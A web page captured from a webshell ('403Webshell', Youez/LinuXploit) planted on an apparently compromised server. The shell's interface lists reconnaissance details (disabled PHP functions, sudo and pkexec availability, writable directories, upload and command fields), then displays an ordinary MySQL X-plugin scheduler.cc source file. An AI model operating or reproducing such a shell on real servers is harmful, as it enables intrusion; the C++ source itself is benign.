403Webshell
Server IP : 172.67.216.182  /  Your IP : 104.23.175.188
Web Server : Apache
System : Linux krdc-ubuntu-s-2vcpu-4gb-amd-blr1-01.localdomain 5.15.0-142-generic #152-Ubuntu SMP Mon May 19 10:54:31 UTC 2025 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/server/mysql/src/rapid/plugin/x/ngs/src/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/server/mysql/src/rapid/plugin/x/ngs/src/scheduler.cc
/*
 * Copyright (c) 2015, 2023, Oracle and/or its affiliates.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License, version 2.0,
 * as published by the Free Software Foundation.
 *
 * This program is also distributed with certain software (including
 * but not limited to OpenSSL) that is licensed under separate terms,
 * as designated in a particular file or component or in included license
 * documentation.  The authors of MySQL hereby grant you an additional
 * permission to link the program and your derivative works with the
 * separately licensed software that they have included with MySQL.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License, version 2.0, for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
 * 02110-1301  USA
 */

#include "ngs_common/bind.h"
#include "ngs/scheduler.h"
#include "ngs/memory.h"
#include "ngs/log.h"

#include "my_rdtsc.h"


using namespace ngs;


// Nanoseconds per millisecond; scales the remaining idle time (kept in
// milliseconds) before it is handed to the condition variable's timed_wait().
const uint64_t MILLI_TO_NANO = 1000000;
// Sentinel meaning "the worker's start-of-idle time stamp is not recorded".
const ulonglong TIME_VALUE_NOT_VALID = 0;

// Construct a stopped scheduler; no worker thread is created until launch().
//
// name        label used in the scheduler's log messages
// thread_key  key passed to ngs::thread_create() for every worker thread
Scheduler_dynamic::Scheduler_dynamic(const char* name, PSI_thread_key thread_key)
: m_name(name),
  m_worker_pending_mutex(KEY_mutex_x_scheduler_dynamic_worker_pending),
  m_worker_pending_cond(KEY_cond_x_scheduler_dynamic_worker_pending),
  m_thread_exit_mutex(KEY_mutex_x_scheduler_dynamic_thread_exit),
  m_thread_exit_cond(KEY_cond_x_scheduler_dynamic_thread_exit),
  // 0 == stopped, 1 == running (toggled by launch()/stop()).
  m_is_running(0),
  m_min_workers_count(1),
  m_workers_count(0),
  m_tasks_count(0),
  // Idle timeout in milliseconds (one minute by default).
  m_idle_worker_timeout(60 * 1000),
  m_thread_key(thread_key)
{
}


// Stop the scheduler on destruction. stop() only acts when the scheduler is
// still marked as running, so destroying a stopped scheduler is harmless.
Scheduler_dynamic::~Scheduler_dynamic()
{
  stop();
}


void Scheduler_dynamic::launch()
{
  int32 int_0 = 0;
  if (m_is_running.compare_exchange_strong(int_0, 1))
  {
    create_min_num_workers();
    log_info("Scheduler \"%s\" started.", m_name.c_str());
  }
}


// Spawn worker threads, under m_worker_pending_mutex, until the worker count
// reaches the configured minimum or the scheduler is no longer running.
void Scheduler_dynamic::create_min_num_workers()
{
  Mutex_lock guard(m_worker_pending_mutex);

  for (;;)
  {
    if (!is_running())
      break;

    if (m_workers_count.load() >= m_min_workers_count.load())
      break;

    create_thread();
  }
}


unsigned int Scheduler_dynamic::set_num_workers(unsigned int n)
{
  log_debug("Scheduler '%s', set number of threads to %u", m_name.c_str(), n);
  m_min_workers_count.store(n);
  try
  {
    create_min_num_workers();
  }
  catch (std::exception &e)
  {
    log_debug("Exception in set minimal number of workers \"%s\"", e.what());
    const int32 m = m_workers_count.load();
    log_warning("Unable to set minimal number of workers to %u; actual value is %i", n, m);
    m_min_workers_count.store(m);
    return m;
  }
  return n;
}


// Change how long (in milliseconds) an idle worker waits before it may be
// removed, then broadcast on the pending-work condition so that workers
// currently waiting wake up and re-evaluate their wait with the new value.
void Scheduler_dynamic::set_idle_worker_timeout(unsigned long long milliseconds)
{
  m_idle_worker_timeout.store(milliseconds);
  m_worker_pending_cond.broadcast(m_worker_pending_mutex);
}


void Scheduler_dynamic::stop()
{
  int32 int_1 = 1;
  if (m_is_running.compare_exchange_strong(int_1, 0))
  {
    while (m_tasks.empty() == false)
    {
      Task* task = NULL;

      if (m_tasks.pop(task))
        ngs::free_object(task);
    }

    m_worker_pending_cond.broadcast(m_worker_pending_mutex);

    {
      Mutex_lock lock(m_thread_exit_mutex);
      while (m_workers_count.load())
        m_thread_exit_cond.wait(m_thread_exit_mutex);
    }

    Thread_t thread;
    while(m_threads.pop(thread))
    {
      ngs::thread_join(&thread, NULL);
    }

    log_info("Scheduler \"%s\" stopped.", m_name.c_str());
  }
}


// Queue a task for execution by a worker thread.
//
// NOTE: On success the scheduler owns the task; it is released by the worker
//       after it ran, or by stop() if it never ran. When false is returned
//       the task was not queued and still belongs to the caller.
//
// Returns false when the scheduler is not running, when task is NULL, or
// when an additional worker thread was needed but could not be created.
bool Scheduler_dynamic::post(Task* task)
{
  if (task == NULL || !is_running())
    return false;

  {
    Mutex_lock guard(m_worker_pending_mutex);

    log_debug("Scheduler '%s', post task", m_name.c_str());

    // Grow the pool when the outstanding tasks would occupy every worker.
    const int32 outstanding_tasks = increase_tasks_count();
    if (outstanding_tasks >= m_workers_count.load())
    {
      try
      {
        create_thread();
      }
      catch (std::exception &e)
      {
        log_error("Exception in post: %s", e.what());
        decrease_tasks_count();
        return false;
      }
    }
  }

  // Retry until the queue accepts the task, then wake one waiting worker.
  while (!m_tasks.push(task)) {}
  m_worker_pending_cond.signal(m_worker_pending_mutex);

  return true;
}


bool Scheduler_dynamic::post(const Task& task)
{
  Task *copy_task = ngs::allocate_object<Task>(task);

  if (post(copy_task))
    return true;

  ngs::free_object(copy_task);

  return false;
}


// Post a task and block the caller until `future` is signalled.
//
// The task is wrapped in a Wait_for_signal::Signal_when_done object bound to
// `future`; presumably that wrapper runs task_to_be_posted and then signals
// `future` (its implementation is not in this file - verify there).
//
// Returns false, after logging an error, when the wrapped task could not be
// posted; true once the wait has finished.
bool Scheduler_dynamic::post_and_wait(const Task& task_to_be_posted)
{
  Wait_for_signal future;

  {
    // The local wrapper lives only in this scope; post(const Task&) queues
    // its own copy, so the local is gone before we start waiting.
    ngs::Scheduler_dynamic::Task task = ngs::bind(&Wait_for_signal::Signal_when_done::execute,
            ngs::allocate_shared<ngs::Wait_for_signal::Signal_when_done>(ngs::ref(future), task_to_be_posted));

    if (!post(task))
    {
      log_error("Internal error scheduling task");
      return false;
    }
  }

  future.wait();

  return true;
}


// Install the monitor that is notified about worker creation/destruction and
// task start/end (see the increase_*/decrease_* helpers).
// NOTE: Scheduler takes ownership of monitor.
void Scheduler_dynamic::set_monitor(Monitor_interface *monitor)
{
  m_monitor.reset(monitor);
}


void *Scheduler_dynamic::worker_proxy(void *data)
{
  return reinterpret_cast<Scheduler_dynamic*>(data)->worker();
}

// Per-thread cleanup run by worker() after its loop. When built with
// HAVE_PSI_THREAD_INTERFACE it invokes delete_current_thread through
// PSI_THREAD_CALL; otherwise it does nothing.
void Scheduler_dynamic::thread_end()
{
#ifdef HAVE_PSI_THREAD_INTERFACE
  PSI_THREAD_CALL(delete_current_thread)();
#endif
}

// Park an idle worker until it is woken or its idle timeout expires, and
// decide whether the worker should terminate.
//
// thread_waiting_started  in/out: time stamp (my_timer_milliseconds()) at
//                         which the calling worker became idle;
//                         TIME_VALUE_NOT_VALID means "not recorded yet" and
//                         is replaced by the current time. It is reset to
//                         TIME_VALUE_NOT_VALID once the timeout is found to
//                         have elapsed already.
//
// Returns true when the idle timeout expired and the pool is above its
// minimum size; the worker count has then already been decreased and the
// caller must exit. Returns false in every other case (scheduler stopped,
// tasks pending, woken before the timeout, or pool at its minimum size).
bool Scheduler_dynamic::wait_if_idle_then_delete_worker(ulonglong &thread_waiting_started)
{
  Mutex_lock lock(m_worker_pending_mutex);

  if (TIME_VALUE_NOT_VALID == thread_waiting_started)
  {
    thread_waiting_started = my_timer_milliseconds();
  }

  if (!is_running())
    return false;

  if (!m_tasks.empty())
    return false;

  // Read the timeout exactly once. set_idle_worker_timeout() stores the new
  // value before it touches m_worker_pending_mutex, so two separate reads
  // could compare against one value and subtract from another; the
  // difference could then be negative and, after the unsigned multiplication
  // below, turn into an enormous wait time.
  const int64 idle_timeout_ms = m_idle_worker_timeout.load();
  const int64 thread_waiting_for_delta_ms = my_timer_milliseconds() - thread_waiting_started;

  if (thread_waiting_for_delta_ms < idle_timeout_ms)
  {
    // Some implementations may signal a condition variable without
    // any reason. We need to record the time when the thread went to the
    // idle state and monitor it, so only the remaining time is waited for.
    const int result = m_worker_pending_cond.timed_wait(m_worker_pending_mutex,
                                       (idle_timeout_ms - thread_waiting_for_delta_ms) *
                                       MILLI_TO_NANO);

    const bool timeout = ETIMEDOUT == result || ETIME == result;

    // Woken before the deadline: go back to the worker loop and look for work.
    if (!timeout)
      return false;
  }
  else
  {
    // Lets invalidate the timeout, if the thread won't die
    // in next iteration then we should reinitialize the start-of-idle value
    thread_waiting_started = TIME_VALUE_NOT_VALID;
  }

  // The worker idled for the full timeout; retire it unless that would take
  // the pool below its configured minimum.
  if (m_workers_count.load() > m_min_workers_count.load())
  {
    decrease_workers_count();
    return true;
  }

  return false;
}

// Body of every worker thread: run queued tasks while the scheduler is
// running, idle when there is nothing to do, and announce the exit so that
// stop() / join_terminating_workers() can reclaim the thread.
// Always returns NULL.
void *Scheduler_dynamic::worker()
{
  // Stays true unless wait_if_idle_then_delete_worker() retired this worker,
  // in which case the worker count has already been decreased there.
  bool worker_active = true;
  // NOTE(review): thread_init() is defined elsewhere; the loop is skipped
  // entirely when it returns false.
  if (thread_init())
  {
    ulonglong thread_waiting_time = TIME_VALUE_NOT_VALID;
    while (is_running())
    {
      bool task_available = false;

      try
      {
        Task *task = NULL;

        // Keep trying to pop while the queue reports pending tasks; another
        // worker may grab the task first, in which case pop() fails.
        while (is_running() &&
               m_tasks.empty() == false && task_available == false)
        {
          task_available = m_tasks.pop(task);
        }

        if (task_available && task)
        {
          // The scoped pointer owns the task for the duration of the call.
          ngs::Memory_instrumented<Task>::Unique_ptr task_ptr(task);
          // The worker did real work, so its idle period starts over.
          thread_waiting_time = TIME_VALUE_NOT_VALID;

          (*task_ptr)();
        }
      }
      catch (std::exception &e)
      {
        // A failing task must not take the worker down; log and carry on.
        log_error("Exception in event loop:\"%s\": %s",
                  m_name.c_str(), e.what());
      }

      if (task_available)
      {
        // Balances the increase done in post(), also when the task threw.
        decrease_tasks_count();
      }
      else
      {
        if (wait_if_idle_then_delete_worker(thread_waiting_time))
        {
          worker_active = false;

          break;
        }
      }
    }
    thread_end();
  }

  {
    // Update the worker count and notify stop(), which waits on
    // m_thread_exit_cond until the count drops to zero.
    Mutex_lock lock_exit(m_thread_exit_mutex);
    Mutex_lock lock_workers(m_worker_pending_mutex);
    if (worker_active)
      decrease_workers_count();
    m_thread_exit_cond.signal();
  }

  // Publish this thread's id so join_terminating_workers() can join it.
  m_terminating_workers.push(my_thread_self());

  return NULL;
}

void Scheduler_dynamic::join_terminating_workers()
{
  my_thread_t tid;
  while (m_terminating_workers.pop(tid))
  {
    Thread_t thread;
    if (m_threads.remove_if(thread, ngs::bind(Scheduler_dynamic::thread_id_matches, ngs::placeholders::_1, tid)))
    {
      ngs::thread_join(&thread, NULL);
    }
  }
}

void Scheduler_dynamic::create_thread()
{
  if (is_running())
  {
    Thread_t thread;
    log_debug("Scheduler '%s', create threads", m_name.c_str());

    ngs::thread_create(m_thread_key, &thread, worker_proxy, this);
    increase_workers_count();
    m_threads.push(thread);
  }
}

// True while the running flag is set, i.e. between launch() and stop().
bool Scheduler_dynamic::is_running()
{
  const bool running = (m_is_running.load() != 0);

  return running;
}


// Notify the monitor (if one is installed) that a worker thread was created,
// then increment the worker counter and return its new value.
int32 Scheduler_dynamic::increase_workers_count()
{
  if (m_monitor)
  {
    m_monitor->on_worker_thread_create();
  }

  const int32 workers_now = ++m_workers_count;
  return workers_now;
}


// Notify the monitor (if one is installed) that a worker thread is going
// away, then decrement the worker counter and return its new value.
int32 Scheduler_dynamic::decrease_workers_count()
{
  if (m_monitor)
  {
    m_monitor->on_worker_thread_destroy();
  }

  const int32 workers_now = --m_workers_count;
  return workers_now;
}


// Notify the monitor (if one is installed) that a task was accepted, then
// increment the outstanding-task counter and return its new value.
int32 Scheduler_dynamic::increase_tasks_count()
{
  if (m_monitor)
  {
    m_monitor->on_task_start();
  }

  const int32 tasks_now = ++m_tasks_count;
  return tasks_now;
}


// Notify the monitor (if one is installed) that a task is finished with,
// then decrement the outstanding-task counter and return its new value.
int32 Scheduler_dynamic::decrease_tasks_count()
{
  if (m_monitor)
  {
    m_monitor->on_task_end();
  }

  const int32 tasks_now = --m_tasks_count;
  return tasks_now;
}

Youez - 2016 - github.com/yon3zu
LinuXploit